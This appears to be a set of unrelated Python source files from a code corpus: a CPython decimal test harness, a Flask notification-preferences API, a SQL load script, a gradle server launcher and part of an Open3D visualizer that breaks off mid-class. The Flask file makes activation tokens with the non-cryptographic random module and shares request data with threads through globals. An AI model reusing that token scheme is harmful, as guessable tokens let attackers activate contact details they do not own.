c_sig = inspect.signature(c_func)
# parameter names:
c_names = list(c_sig.parameters.keys())
p_names = [x for x in p_sig.parameters.keys() if not
x.startswith('_')]
self.assertEqual(c_names, p_names,
msg="parameter name mismatch in %s" % p_func)
c_kind = [x.kind for x in c_sig.parameters.values()]
p_kind = [x[1].kind for x in p_sig.parameters.items() if not
x[0].startswith('_')]
# parameters:
if attr != 'setcontext':
self.assertEqual(c_kind, p_kind,
msg="parameter kind mismatch in %s" % p_func)
def test_inspect_types(self):
POS = inspect._ParameterKind.POSITIONAL_ONLY
POS_KWD = inspect._ParameterKind.POSITIONAL_OR_KEYWORD
# Type heuristic (type annotations would help!):
pdict = {C: {'other': C.Decimal(1),
'third': C.Decimal(1),
'x': C.Decimal(1),
'y': C.Decimal(1),
'z': C.Decimal(1),
'a': C.Decimal(1),
'b': C.Decimal(1),
'c': C.Decimal(1),
'exp': C.Decimal(1),
'modulo': C.Decimal(1),
'num': "1",
'f': 1.0,
'rounding': C.ROUND_HALF_UP,
'context': C.getcontext()},
P: {'other': P.Decimal(1),
'third': P.Decimal(1),
'a': P.Decimal(1),
'b': P.Decimal(1),
'c': P.Decimal(1),
'exp': P.Decimal(1),
'modulo': P.Decimal(1),
'num': "1",
'f': 1.0,
'rounding': P.ROUND_HALF_UP,
'context': P.getcontext()}}
def mkargs(module, sig):
args = []
kwargs = {}
for name, param in sig.parameters.items():
if name == 'self': continue
if param.kind == POS:
args.append(pdict[module][name])
elif param.kind == POS_KWD:
kwargs[name] = pdict[module][name]
else:
raise TestFailed("unexpected parameter kind")
return args, kwargs
def tr(s):
"""The C Context docstrings use 'x' in order to prevent confusion
with the article 'a' in the descriptions."""
if s == 'x': return 'a'
if s == 'y': return 'b'
if s == 'z': return 'c'
return s
def doit(ty):
p_type = getattr(P, ty)
c_type = getattr(C, ty)
for attr in dir(p_type):
if attr.startswith('_'):
continue
p_func = getattr(p_type, attr)
c_func = getattr(c_type, attr)
if inspect.isfunction(p_func):
p_sig = inspect.signature(p_func)
c_sig = inspect.signature(c_func)
# parameter names:
p_names = list(p_sig.parameters.keys())
c_names = [tr(x) for x in c_sig.parameters.keys()]
self.assertEqual(c_names, p_names,
msg="parameter name mismatch in %s" % p_func)
p_kind = [x.kind for x in p_sig.parameters.values()]
c_kind = [x.kind for x in c_sig.parameters.values()]
# 'self' parameter:
self.assertIs(p_kind[0], POS_KWD)
self.assertIs(c_kind[0], POS)
# remaining parameters:
if ty == 'Decimal':
self.assertEqual(c_kind[1:], p_kind[1:],
msg="parameter kind mismatch in %s" % p_func)
else: # Context methods are positional only in the C version.
self.assertEqual(len(c_kind), len(p_kind),
msg="parameter kind mismatch in %s" % p_func)
# Run the function:
args, kwds = mkargs(C, c_sig)
try:
getattr(c_type(9), attr)(*args, **kwds)
except Exception as err:
raise TestFailed("invalid signature for %s: %s %s" % (c_func, args, kwds))
args, kwds = mkargs(P, p_sig)
try:
getattr(p_type(9), attr)(*args, **kwds)
except Exception as err:
raise TestFailed("invalid signature for %s: %s %s" % (p_func, args, kwds))
doit('Decimal')
doit('Context')
all_tests = [
CExplicitConstructionTest, PyExplicitConstructionTest,
CImplicitConstructionTest, PyImplicitConstructionTest,
CFormatTest, PyFormatTest,
CArithmeticOperatorsTest, PyArithmeticOperatorsTest,
CThreadingTest, PyThreadingTest,
CUsabilityTest, PyUsabilityTest,
CPythonAPItests, PyPythonAPItests,
CContextAPItests, PyContextAPItests,
CContextWithStatement, PyContextWithStatement,
CContextFlags, PyContextFlags,
CSpecialContexts, PySpecialContexts,
CContextInputValidation, PyContextInputValidation,
CContextSubclassing, PyContextSubclassing,
CCoverage, PyCoverage,
CFunctionality, PyFunctionality,
CWhitebox, PyWhitebox,
CIBMTestCases, PyIBMTestCases,
]
# Delete C tests if _decimal.so is not present.
if not C:
all_tests = all_tests[1::2]
else:
all_tests.insert(0, CheckAttributes)
all_tests.insert(1, SignatureTest)
def test_main(arith=None, verbose=None, todo_tests=None, debug=None):
""" Execute the tests.
Runs all arithmetic tests if arith is True or if the "decimal" resource
is enabled in regrtest.py
"""
init(C)
init(P)
global TEST_ALL, DEBUG
TEST_ALL = arith if arith is not None else is_resource_enabled('decimal')
DEBUG = debug
if todo_tests is None:
test_classes = all_tests
else:
test_classes = [CIBMTestCases, PyIBMTestCases]
# Dynamically build custom test definition for each file in the test
# directory and add the definitions to the DecimalTest class. This
    # procedure ensures that new files do not get skipped.
for filename in os.listdir(directory):
if '.decTest' not in filename or filename.startswith("."):
continue
head, tail = filename.split('.')
if todo_tests is not None and head not in todo_tests:
continue
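        # Bind the current filename via the default argument f=filename so each
        # generated test method evaluates its own file (a plain closure would
        # late-bind and every test would run only the last file).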
tester = lambda self, f=filename: self.eval_file(directory + f)
setattr(CIBMTestCases, 'test_' + head, tester)
setattr(PyIBMTestCases, 'test_' + head, tester)
del filename, head, tail, tester
try:
run_unittest(*test_classes)
if todo_tests is None:
from doctest import IGNORE_EXCEPTION_DETAIL
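            # Swap sys.modules['decimal'] so doctests that import decimal run
            # against the implementation under test.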
savedecimal = sys.modules['decimal']
if C:
sys.modules['decimal'] = C
run_doctest(C, verbose, optionflags=IGNORE_EXCEPTION_DETAIL)
sys.modules['decimal'] = P
run_doctest(P, verbose)
sys.modules['decimal'] = savedecimal
finally:
if C: C.setcontext(ORIGINAL_CONTEXT[C])
P.setcontext(ORIGINAL_CONTEXT[P])
if not C:
warnings.warn('C tests skipped: no module named _decimal.',
UserWarning)
    if orig_sys_decimal is not sys.modules['decimal']:
raise TestFailed("Internal error: unbalanced number of changes to "
"sys.modules['decimal'].")
if __name__ == '__main__':
import optparse
p = optparse.OptionParser("test_decimal.py [--debug] [{--skip | test1 [test2 [...]]}]")
p.add_option('--debug', '-d', action='store_true', help='shows the test number and context before each test')
p.add_option('--skip', '-s', action='store_true', help='skip over 90% of the arithmetic tests')
(opt, args) = p.parse_args()
if opt.skip:
test_main(arith=False, verbose=True)
elif args:
test_main(arith=True, verbose=True, todo_tests=args, debug=opt.debug)
else:
test_main(arith=True, verbose=True)
|
NotificationPreferences.py
|
from flask import request, render_template
from flask_restful import Resource
from flask_jwt_extended import get_jwt_identity, jwt_required
from flask_mail import Message
import boto3
import random
import string
import json
import iot_logging
from threading import Thread
from datetime import datetime, timedelta
from urllib.parse import quote_plus
from iot_api import bcrypt, mail, app
from iot_api.user_api.model import User
#from iot_api.user_api.enums import WebUrl
from iot_api.user_api.models import (
NotificationPreferences, NotificationAlertSettings,
NotificationDataCollectorSettings, NotificationAdditionalEmail,
NotificationAdditionalTelephoneNumber, DataCollector,
NotificationAssetImportance
)
from iot_api.user_api.repository import NotificationPreferencesRepository
from iot_api.user_api import Error
from iot_api.user_api.schemas.notification_preferences_schema import NotificationPreferencesSchema
from iot_api import config
import smtplib
import email.utils
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
LOG = iot_logging.getLogger(__name__)
class NotificationPreferencesAPI(Resource):
@jwt_required
def get(self):
user_identity = get_jwt_identity()
user = User.find_by_username(user_identity)
if not user: raise Error.Forbidden()
preferences = NotificationPreferences.find_one(user.id)
alert_settings = NotificationAlertSettings.find_one(user.id)
asset_importance = NotificationAssetImportance.get_with(user.id)
dc_settings = NotificationDataCollectorSettings.find(user.id)
emails = NotificationAdditionalEmail.find(user.id)
phones = NotificationAdditionalTelephoneNumber.find(user.id)
emails = [item.to_dict() for item in emails]
phones = [item.to_dict() for item in phones]
preferences = preferences.to_dict(phones, emails)
alert_settings = alert_settings.to_dict()
dc_settings = [dc.to_dict() for dc in dc_settings]
if not asset_importance:
asset_importance = NotificationAssetImportance(user_id = user.id).save()
tag_list = NotificationPreferencesRepository.get_asset_tags(user.id)
response = {
'destinations': preferences,
'risks': alert_settings,
'asset_importance': [
{
'name': 'high',
'enabled': asset_importance.high,
},
{
'name': 'medium',
'enabled': asset_importance.medium,
},
{
'name': 'low',
'enabled': asset_importance.low,
},
],
'dataCollectors': dc_settings,
'asset_tags': [{
"id" : tag.id,
"name" : tag.name,
"color": tag.color
} for tag in tag_list]
}
return response, 200
@jwt_required
def put(self):
user_identity = get_jwt_identity()
user = User.find_by_username(user_identity)
if not user: raise Error.Forbidden()
body = json.loads(request.data)
parsed_result = NotificationPreferencesSchema().load(body).data
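        # These module-level lists are filled in while processing the request and
        # consumed afterwards by the background activation threads started below.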
global activation_emails, activation_sms
activation_emails = []
activation_sms = []
# Update destinations
try:
destinations = parsed_result.get('destinations')
np = NotificationPreferences.find_one(user.id)
for destination in destinations:
attr = destination.get('destination')
if attr not in ('sms', 'push', 'email'):
                    LOG.error('Destination must be one of these: sms, push, email. It\'s: {0}'.format(attr))
                    return {'error': 'Destination must be one of these: sms, push, email'}, 400
setattr(np, attr, destination.get('enabled'))
if attr == 'sms' and destination.get('enabled'):
existing_phones = NotificationAdditionalTelephoneNumber.find(user.id)
for phone in existing_phones:
if len(list(filter(lambda item: item.get('id') == phone.id, destination.get('additional')))) == 0:
phone.delete()
for phone in destination.get('additional'):
id = phone.get('id')
phone = phone.get('phone')
if id:
filtered_phones = list(filter(lambda item: id == item.id, existing_phones))
if len(filtered_phones) == 0:
NotificationPreferences.rollback()
                                LOG.error('Phone id {0} does not exist'.format(id))
                                return {'error': 'phone id does not exist'}, 400
elif filtered_phones[0].phone != phone:
filtered_phones[0].phone = phone
filtered_phones[0].active = False
token = random_string(10)
filtered_phones[0].token = quote_plus(token)
filtered_phones[0].creation_date = datetime.now()
activation_sms.append({'phone': phone, 'token': filtered_phones[0].token})
else:
token = random_string(10)
token = quote_plus(token)
activation_sms.append({'phone': phone, 'token': token})
                            NotificationAdditionalTelephoneNumber(phone=phone, creation_date=datetime.now(), token = token, active = False, user_id = user.id).save() # stays inactive until confirmed via the activation link
if attr == 'email' and destination.get('enabled'):
existing_emails = NotificationAdditionalEmail.find(user.id)
for email in existing_emails:
if len(list(filter(lambda item: item.get('id') == email.id, destination.get('additional')))) == 0:
email.delete()
for email in destination.get('additional'):
id = email.get('id')
email = email.get('email').lower()
if id:
filtered_emails = list(filter(lambda item: id == item.id, existing_emails))
if len(filtered_emails) == 0:
NotificationPreferences.rollback()
                                LOG.error('Email id {0} does not exist'.format(id))
                                return {'error': 'email id does not exist'}, 400
elif filtered_emails[0].email != email:
filtered_emails[0].email = email
filtered_emails[0].active = False
token = random_string(10)
filtered_emails[0].token = quote_plus(token)
filtered_emails[0].creation_date = datetime.now()
activation_emails.append({'email': email, 'token': filtered_emails[0].token})
else:
token = random_string(10)
token = quote_plus(token)
activation_emails.append({'email': email, 'token': token})
NotificationAdditionalEmail(email=email, creation_date=datetime.now(), token = token, active = False, user_id = user.id).save()
# Update emails -> Delete removed, add new as pending, change to pending to updated
# Update phones ->Delete removed, add new as pending, change to pending to updated
# Update risks
risks = parsed_result.get('risks')
nas = NotificationAlertSettings.find_one(user.id)
for risk in risks:
attr = risk.get('name')
                if attr not in ('high', 'medium', 'low', 'info'):
                    NotificationPreferences.rollback()
                    LOG.error('Risk must be one of these: high, medium, low, info. But it\'s: {0}'.format(attr))
                    return {'error': 'Risk must be one of these: high, medium, low, info'}, 400
setattr(nas, attr, risk.get('enabled'))
# Update asset importances
asset_importances = parsed_result.get('asset_importance')
nai = NotificationAssetImportance.get_with(user_id = user.id)
for importance in asset_importances:
attr = importance.get('name')
if attr not in ('high', 'medium', 'low'):
                    raise Error.BadRequest('Asset importance name must be one of these: high, medium, low. But it\'s: {0}'.format(attr))
setattr(nai, attr, importance.get('enabled'))
# Update asset tags
asset_tags = parsed_result.get('asset_tags')
tag_id_list = [tag.get('id') for tag in asset_tags]
NotificationPreferencesRepository.set_asset_tags(user.id, tag_id_list, False)
# Update data collectors. Check if dc belongs to user organization
data_collectors = parsed_result.get('data_collectors')
for dcp in data_collectors:
dc = DataCollector.find_by_id(dcp.get('data_collector_id'))
if dc and dc.organization_id != user.organization_id:
NotificationPreferences.rollback()
return None, 403
if dc:
settings = NotificationDataCollectorSettings.find_one(user_id = user.id, data_collector_id = dc.id)
if dc and settings:
settings.enabled = dcp.get('enabled')
NotificationPreferences.commit()
            thread = Thread(target = send_activation_emails)
            thread.daemon = True
            thread.start()
            thread = Thread(target = send_activation_sms)
            thread.daemon = True
            thread.start()
except Exception as exc:
NotificationPreferences.rollback()
LOG.error(exc)
return {'error': 'Something went wrong'}, 500
class NotificationEmailActivationAPI(Resource):
def put(self, token):
email = NotificationAdditionalEmail.find_one_by_token(token)
if not email:
return None, 404
if email.active:
return {'code': 'EMAIL_ALREADY_ACTIVE'}, 400
if email.creation_date + timedelta(hours=24) < datetime.now():
            return {'code': 'DISABLED_TOKEN'}, 400
email.active = True
email.update()
return {'email': email.email}, 200
class NotificationPhoneActivationAPI(Resource):
def put(self, token):
phone = NotificationAdditionalTelephoneNumber.find_one_by_token(token)
if not phone:
return None, 404
if phone.active:
return {'code': 'PHONE_ALREADY_ACTIVE'}, 400
if phone.creation_date + timedelta(hours=24) < datetime.now():
            return {'code': 'DISABLED_TOKEN'}, 400
phone.active = True
phone.update()
return {'phone': phone.phone}, 200
def send_activation_emails():
if config.SEND_EMAILS:
with app.app_context():
server = smtplib.SMTP(config.SMTP_HOST, config.SMTP_PORT)
#server.set_debuglevel(1)
server.ehlo()
server.starttls()
            #smtplib docs recommend calling ehlo() before & after starttls()
server.ehlo()
server.login(config.SMTP_USERNAME, config.SMTP_PASSWORD)
            for item in activation_emails:
                token = item.get('token')
                email_user = item.get('email')
                full_url = config.BRAND_URL + "notifications/email_activation/" + str(token)
                print('init email sending')
                # Build a fresh message per recipient: reusing one MIMEMultipart
                # would accumulate 'To' headers and body parts across iterations.
                msg = MIMEMultipart('alternative')
                msg['Subject'] = f"{config.BRAND_NAME} Email Confirmation"
                msg['From'] = email.utils.formataddr((config.SMTP_SENDER_NAME, config.SMTP_SENDER))
                msg['To'] = email_user
                part = MIMEText(render_template(
                    'notification_activation.html',
                    brand_name=config.BRAND_NAME,
                    full_url=full_url
                ),'html')
                msg.attach(part)
                server.sendmail(config.SMTP_SENDER, email_user, msg.as_string())
                print("finished email sending")
server.close()
def send_activation_sms():
if config.SEND_SMS:
sns = boto3.client('sns')
for item in activation_sms:
token = item.get('token')
phone = item.get('phone')
full_url = config.BRAND_URL + "notifications/phone_activation/" + str(token)
sns.publish(
PhoneNumber=phone,
Message=f'Please activate this phone to receive {config.BRAND_NAME} notifications by clicking the link ' + full_url,
)
def random_string(length):
"""Generate a random string with the combination of lowercase and uppercase letters """
letters = string.ascii_letters
return ''.join(random.choice(letters) for i in range(length))
|
load_generator.py
|
import pyodbc
import os
from multiprocessing import Process
def get_file_content(full_path):
"""Get file content function from read_sql_files_to_db.py"""
print(full_path)
    num_bytes = min(32, os.path.getsize(full_path))
    with open(full_path, 'rb') as f:
        raw = f.read(num_bytes)
    # A UTF-16 LE file starts with the byte-order mark b'\xff\xfe', which shows
    # up as the escaped text '\xff\xfe' in the repr produced by str(raw).
    if '\\xff\\xfe' in str(raw):
        print("file is utf-16")
        with open(full_path, encoding="utf-16",
                  errors="backslashreplace") as the_file:
            data = the_file.read()
    else:
        print("file is latin-1")
        with open(full_path, encoding="latin-1",
                  errors="backslashreplace") as the_file:
            data = the_file.read()
    return data
def update_database_data():
cnxn = pyodbc.connect('Driver={SQL Server};'
'Server=localhost;'
'Database=ravexdemo6;'
'Trusted_Connection=yes;queryTimeout=60', autocommit=True)
thesql = get_file_content("C:\\Users\\jong\\Documents\\GitHub\\data-projects\\python\\load_generator\\generate_load.sql")
cursor = cnxn.cursor()
cursor.execute(thesql)
    cursor.close()
    cnxn.close()
if __name__ == '__main__':
update_database_data()
# p1 = Process(target=update_database_data)
# p1.start()
# p2 = Process(target=update_database_data)
# p2.start()
# p3 = Process(target=update_database_data)
# p3.start()
# p4 = Process(target=update_database_data)
# p4.start()
# p5 = Process(target=update_database_data)
# p5.start()
# p1.join()
# p2.join()
# p3.join()
# p4.join()
# p5.join()
|
server_controller.py
|
import subprocess
import sys
import os.path as path
from threading import Thread
from queue import Queue, Empty
module_dir = path.abspath(path.join(path.dirname(__file__)))
_root_dir = path.abspath(path.join(module_dir, '..'))
class StdOutReader:
def __init__(self, stream, verbose=False):
self._stream = stream
self._queue = Queue()
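        # Drain the wrapped stream on a daemon thread and buffer lines in a
        # queue so readline() can poll without blocking the caller.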
def _reader(s, queue, verbose):
while True:
line = s.readline()
s.flush()
if line:
if verbose:
print(line)
queue.put(line)
self._thread = Thread(target=_reader, args=(self._stream, self._queue, verbose))
self._thread.daemon = True
self._thread.start()
    def readline(self):
        try:
            # wait briefly for a line; block=False would make timeout meaningless
            return str(self._queue.get(timeout=0.1))
        except Empty:
            return ''
class Initializer:
def __init__(self, project):
cmd = self._cmd_for_task(project, 'assembleDist', 'installDist')
print("gradle cmd: {}".format(cmd))
project_module_dir = path.abspath(path.join(_root_dir, project))
self._init_script = path.join(project_module_dir,
'build/install/{}/bin/{}'.format(project, project))
if subprocess.call(cmd, shell=True) == 0 and path.exists(self._init_script):
print('assembleDist installDist success')
else:
print('assembleDist installDist failed')
sys.exit(1)
    def _cmd_for_task(self, project, *tasks):
        # Build e.g. ":project:taskA :project:taskB" for the gradle command line.
        t = " ".join(':{}:{}'.format(project, task) for task in tasks)
        return "{}/gradlew -p {} {}".format(_root_dir, _root_dir, t)
@property
def init_script(self):
return self._init_script
class Server:
def __init__(self, script, ready_str, *args, **kwargs):
self._port = kwargs.get('port', '')
host = kwargs.get('host', '')
self._name = kwargs.get('name', 'unnamed')
self._verbose = kwargs.get('verbose', False)
        argv = " ".join(str(a).strip() for a in args)
self.cmd = "{} {} {} {} {}".format(script, host, self.port, self.name, argv)
self.process = None
self.ready_str = ready_str
@property
def port(self):
return str(self._port)
@property
def name(self):
return str(self._name)
def run(self):
if self.process is None:
print("server start cmd: {}".format(self.cmd))
self.process = subprocess.Popen("exec " + self.cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
nb_err = StdOutReader(self.process.stderr, verbose=self._verbose)
nb_out = StdOutReader(self.process.stdout, verbose=self._verbose)
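            # Poll both output streams until the ready marker appears.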
while True:
if self.ready_str in nb_err.readline() or self.ready_str in nb_out.readline():
break
return self
def kill(self):
if self.process is not None:
self.process.kill()
|
visualizer.py
|
import math
import numpy as np
import threading
import open3d as o3d
from open3d.visualization import gui
from open3d.visualization import rendering
from collections import deque
from .boundingbox import *
from .colormap import *
from .labellut import *
import time
class Model:
"""The class that helps build visualization models based on attributes, data, and methods."""
bounding_box_prefix = "Bounding Boxes/"
class BoundingBoxData:
"""The class to define a bounding box that is used to describe the target location.
**Args:**
name: The name of the pointcloud array.
            boxes: The array of bounding boxes for the pointcloud.
"""
def __init__(self, name, boxes):
self.name = name
self.boxes = boxes
def __init__(self):
# Note: the tpointcloud cannot store the actual data arrays, because
# the tpointcloud requires specific names for some arrays (e.g. "points",
# "colors"). So the tpointcloud exists for rendering and initially only
# contains the "points" array.
self.tclouds = {} # name -> tpointcloud
self.data_names = [] # the order data will be displayed / animated
self.bounding_box_data = [] # [BoundingBoxData]
self._data = {} # name -> {attr_name -> numpyarray}
self._known_attrs = {} # name -> set(attrs)
self._attr2minmax = {} # only access in _get_attr_minmax()
self._attr_rename = {"label": "labels", "feat": "feature"}
def _init_data(self, name):
tcloud = o3d.t.geometry.PointCloud(o3d.core.Device("CPU:0"))
self.tclouds[name] = tcloud
self._data[name] = {}
self.data_names.append(name)
"""Check if the data is loaded."""
def is_loaded(self, name):
if name in self._data:
return len(self._data[name]) > 0
else:
# if the name isn't in the data, presumably it is loaded
# (for instance, if this is a bounding box).
return True
"""If data is not loaded, then load the data."""
def load(self, name, fail_if_no_space=False):
assert (False) # pure virtual
def unload(self, name):
assert (False) # pure virtual
"""Create a point cloud based on the data provided. The data should include name and points."""
def create_point_cloud(self, data):
assert ("name" in data) # name is a required field
assert ("points" in data) # 'points' is a required field
name = data["name"]
pts = self._convert_to_numpy(data["points"])
tcloud = o3d.t.geometry.PointCloud(o3d.core.Device("CPU:0"))
known_attrs = set()
if pts.shape[1] >= 4:
# We can't use inplace Tensor creation (e.g. from_numpy())
# because the resulting arrays won't be contiguous. However,
# TensorList can be inplace.
xyz = pts[:, [0, 1, 2]]
tcloud.point["points"] = Visualizer._make_tcloud_array(xyz,
copy=True)
else:
tcloud.point["points"] = Visualizer._make_tcloud_array(pts)
self.tclouds[name] = tcloud
# Add scalar attributes and vector3 attributes
attrs = {}
for k, v in data.items():
attr = self._convert_to_numpy(v)
if attr is None:
continue
attr_name = k
if attr_name == "point":
continue
new_name = self._attr_rename.get(attr_name)
if new_name is not None:
attr_name = new_name
if len(attr.shape) == 1 or len(attr.shape) == 2:
attrs[attr_name] = attr
known_attrs.add(attr_name)
self._data[name] = attrs
self._known_attrs[name] = known_attrs
def _convert_to_numpy(self, ary):
if isinstance(ary, list):
try:
return np.array(ary, dtype='float32')
except TypeError:
return None
elif isinstance(ary, np.ndarray):
if len(ary.shape) == 2 and ary.shape[0] == 1:
ary = ary[0] # "1D" array as 2D: [[1, 2, 3,...]]
if ary.dtype.name.startswith('int'):
return np.array(ary, dtype='float32')
else:
return ary
try:
import tensorflow as tf
if isinstance(ary, tf.Tensor):
return self._convert_to_numpy(ary.numpy())
        except Exception:
            pass
try:
import torch
if isinstance(ary, torch.Tensor):
return self._convert_to_numpy(ary.detach().cpu().numpy())
        except Exception:
            pass
return None
"""Get an attribute from data based on the name passed."""
def get_attr(self, name, attr_name):
if name in self._data:
attrs = self._data[name]
if attr_name in attrs:
return attrs[attr_name]
return None
"""Get a shape from data based on the name passed."""
def get_attr_shape(self, name, attr_name):
attr = self.get_attr(name, attr_name)
if attr is not None:
return attr.shape
return []
"""Get the minimum and maximum for an attribute."""
def get_attr_minmax(self, attr_name, channel):
attr_key_base = attr_name + ":" + str(channel)
attr_min = 1e30
attr_max = -1e30
for name in self._data.keys():
key = name + ":" + attr_key_base
if key not in self._attr2minmax:
attr = self.get_attr(name, attr_name)
if attr is None: # clouds may not have all the same attributes
continue
if len(attr.shape) > 1:
attr = attr[:, channel]
self._attr2minmax[key] = (attr.min(), attr.max())
amin, amax = self._attr2minmax[key]
attr_min = min(attr_min, amin)
attr_max = max(attr_max, amax)
if attr_min > attr_max:
return (0.0, 0.0)
return (attr_min, attr_max)
"""Get a list of attributes based on the name."""
def get_available_attrs(self, names):
attr_names = None
for n in names:
known = self._known_attrs.get(n)
if known is not None:
if attr_names is None:
attr_names = known
else:
attr_names = attr_names.intersection(known)
if attr_names is None:
return []
return sorted(attr_names)
"""Calculate the bounds for a pointcloud."""
def calc_bounds_for(self, name):
if name in self.tclouds and not self.tclouds[name].is_empty():
tcloud = self.tclouds[name]
# Ideally would simply return tcloud.compute_aabb() here, but it can
# be very slow on macOS with clang 11.0
pts = tcloud.point["points"].numpy()
min_val = (pts[:, 0].min(), pts[:, 1].min(), pts[:, 2].min())
max_val = (pts[:, 0].max(), pts[:, 1].max(), pts[:, 2].max())
return [min_val, max_val]
else:
return [(0.0, 0.0, 0.0), (0.0, 0.0, 0.0)]
class DataModel(Model):
"""The class for data i/o and storage of visualization.
**Args:**
userdata: The dataset to be used in the visualization.
"""
def __init__(self, userdata):
super().__init__()
# We could just create the TPointCloud here, but that would cause the UI
# to block. If we do it on load then the loading dialog will display.
self._name2srcdata = {}
for d in userdata:
name = d["name"]
while name in self._data: # ensure each name is unique
name = name + "_"
self._init_data(name)
self._name2srcdata[name] = d
"""Load a pointcloud based on the name provided."""
def load(self, name, fail_if_no_space=False):
if self.is_loaded(name):
return
self.create_point_cloud(self._name2srcdata[name])
"""Unload a pointcloud."""
def unload(self, name):
pass
class DatasetModel(Model):
"""The class used to manage a dataset model.
**Args:**
        dataset: The 3D ML dataset to use. You can use the base dataset, sample datasets, or a custom dataset.
split: A string identifying the dataset split that is usually one of 'training', 'test', 'validation', or 'all'.
indices: The indices to be used for the datamodel. This may vary based on the split used.
"""
def __init__(self, dataset, split, indices):
super().__init__()
self._dataset = None
self._name2datasetidx = {}
self._memory_limit = 8192 * 1024 * 1024 # memory limit in bytes
self._current_memory_usage = 0
self._cached_data = deque()
self._dataset = dataset.get_split(split)
if len(self._dataset) > 0:
if indices is None:
indices = range(0, len(self._dataset))
# Some results from get_split() (like "training") are randomized.
# Sort, so that the same index always returns the same piece of data.
path2idx = {}
for i in range(0, len(self._dataset.path_list)):
path2idx[self._dataset.path_list[i]] = i
real_indices = [path2idx[p] for p in sorted(path2idx.keys())]
indices = [real_indices[idx] for idx in indices]
# SemanticKITTI names its items <sequence#>_<timeslice#>,
# "mm_nnnnnn". We'd like to use the hierarchical feature of the tree
# to separate the sequences. We cannot change the name in the dataset
# because this format is used to report algorithm results, so do it
# here.
underscore_to_slash = False
if dataset.__class__.__name__ == "SemanticKITTI":
underscore_to_slash = True
for i in indices:
info = self._dataset.get_attr(i)
name = info["name"]
if underscore_to_slash:
name = name.replace("_", "/")
while name in self._data: # ensure each name is unique
name = name + "_"
self._init_data(name)
self._name2datasetidx[name] = i
if dataset.__class__.__name__ in [
"Toronto3D", "Semantic3D", "S3DIS"
]:
self._attr_rename["feat"] = "colors"
self._attr_rename["feature"] = "colors"
else:
print("[ERROR] Dataset split has no data")
"""Check if the data is loaded."""
def is_loaded(self, name):
loaded = super().is_loaded(name)
if loaded and name in self._cached_data:
# make this point cloud the most recently used
self._cached_data.remove(name)
self._cached_data.append(name)
return loaded
"""If data is not loaded, then load the data."""
def load(self, name, fail_if_no_space=False):
assert (name in self._name2datasetidx)
if self.is_loaded(name):
return True
idx = self._name2datasetidx[name]
data = self._dataset.get_data(idx)
data["name"] = name
data["points"] = data["point"]
if 'bounding_boxes' in data:
self.bounding_box_data.append(
Model.BoundingBoxData(name, data['bounding_boxes']))
self.create_point_cloud(data)
size = self._calc_pointcloud_size(self._data[name], self.tclouds[name])
if size + self._current_memory_usage > self._memory_limit:
if fail_if_no_space:
self.unload(name)
return False
else:
# Remove oldest from cache
remove_name = self._cached_data.popleft()
remove_size = self._calc_pointcloud_size(
self._data[remove_name], self.tclouds[remove_name])
self._current_memory_usage -= remove_size
self.unload(remove_name)
# Add new point cloud to cache
self._cached_data.append(name)
self._current_memory_usage += size
return True
else:
self._current_memory_usage += size
self._cached_data.append(name)
return True
def _calc_pointcloud_size(self, raw_data, pcloud):
pcloud_size = 0
for (attr, arr) in raw_data.items():
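            # attribute arrays are float32: 4 bytes per element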
pcloud_size += arr.size * 4
        # Point cloud consumes 64 bytes per point of GPU memory
pcloud_size += pcloud.point["points"].num_elements() * 64
return pcloud_size
"""Unload the data (only if you have loaded it earlier)."""
def unload(self, name):
# Only unload if this was loadable; we might have an in-memory,
# user-specified data created directly through create_point_cloud().
if name in self._name2datasetidx:
tcloud = o3d.t.geometry.PointCloud(o3d.core.Device("CPU:0"))
self.tclouds[name] = tcloud
self._data[name] = {}
bbox_name = Model.bounding_box_prefix + name
for i in range(0, len(self.bounding_box_data)):
if self.bounding_box_data[i].name == bbox_name:
self.bounding_box_data.pop(i)
break
class Visualizer:
"""The visualizer class for dataset objects and custom point clouds."""
class LabelLUTEdit:
"""This class includes functionality for managing a labellut (label look-up-table)."""
def __init__(self):
self.widget = gui.TreeView()
self._on_changed = None # takes no args, returns no value
self.clear()
"""Clears the look-up table."""
def clear(self):
self.widget.clear()
self._label2color = {}
"""Checks if the look-up table is empty."""
def is_empty(self):
return len(self._label2color) == 0
"""Returns a list of label keys."""
def get_colors(self):
return [
self._label2color[label]
for label in sorted(self._label2color.keys())
]
def set_on_changed(self, callback): # takes no args, no return value
self._on_changed = callback
"""Updates the labels based on look-up table passsed."""
def set_labels(self, labellut):
self.widget.clear()
root = self.widget.get_root_item()
for key in sorted(labellut.labels.keys()):
lbl = labellut.labels[key]
color = lbl.color
if len(color) == 3:
color += [1.0]
self._label2color[key] = color
color = gui.Color(lbl.color[0], lbl.color[1], lbl.color[2])
cell = gui.LUTTreeCell(
str(key) + ": " + lbl.name, True, color, None, None)
cell.checkbox.set_on_checked(
self._make_on_checked(key, self._on_label_checked))
cell.color_edit.set_on_value_changed(
self._make_on_color_changed(key,
self._on_label_color_changed))
self.widget.add_item(root, cell)
def _make_on_color_changed(self, label, member_func):
def on_changed(color):
member_func(label, color)
return on_changed
def _on_label_color_changed(self, label, gui_color):
self._label2color[label] = [
gui_color.red, gui_color.green, gui_color.blue,
self._label2color[label][3]
]
if self._on_changed is not None:
self._on_changed()
def _make_on_checked(self, label, member_func):
def on_checked(checked):
member_func(label, checked)
return on_checked
def _on_label_checked(self, label, checked):
if checked:
alpha = 1.0
else:
alpha = 0.0
color = self._label2color[label]
self._label2color[label] = [color[0], color[1], color[2], alpha]
if self._on_changed is not None:
self._on_changed()
class ColormapEdit:
"""This class is used to create a color map for visualization of points."""
def __init__(self, window, em):
self.colormap = None
self.widget = gui.Vert()
self._window = window
self._min_value = 0.0
self._max_value = 1.0
self._on_changed = None # takes no args, no return value
self._itemid2idx = {}
self._min_label = gui.Label("")
self._max_label = gui.Label("")
grid = gui.VGrid(2)
grid.add_child(gui.Label("Range (min):"))
grid.add_child(self._min_label)
grid.add_child(gui.Label("Range (max):"))
grid.add_child(self._max_label)
self.widget.add_child(grid)
self.widget.add_fixed(0.5 * em)
self.widget.add_child(gui.Label("Colormap"))
self._edit = gui.TreeView()
self._edit.set_on_selection_changed(self._on_selection_changed)
self.widget.add_child(self._edit)
self._delete = gui.Button("Delete")
self._delete.horizontal_padding_em = 0.5
self._delete.vertical_padding_em = 0
self._delete.set_on_clicked(self._on_delete)
self._add = gui.Button("Add")
self._add.horizontal_padding_em = 0.5
self._add.vertical_padding_em = 0
self._add.set_on_clicked(self._on_add)
h = gui.Horiz()
h.add_stretch()
h.add_child(self._delete)
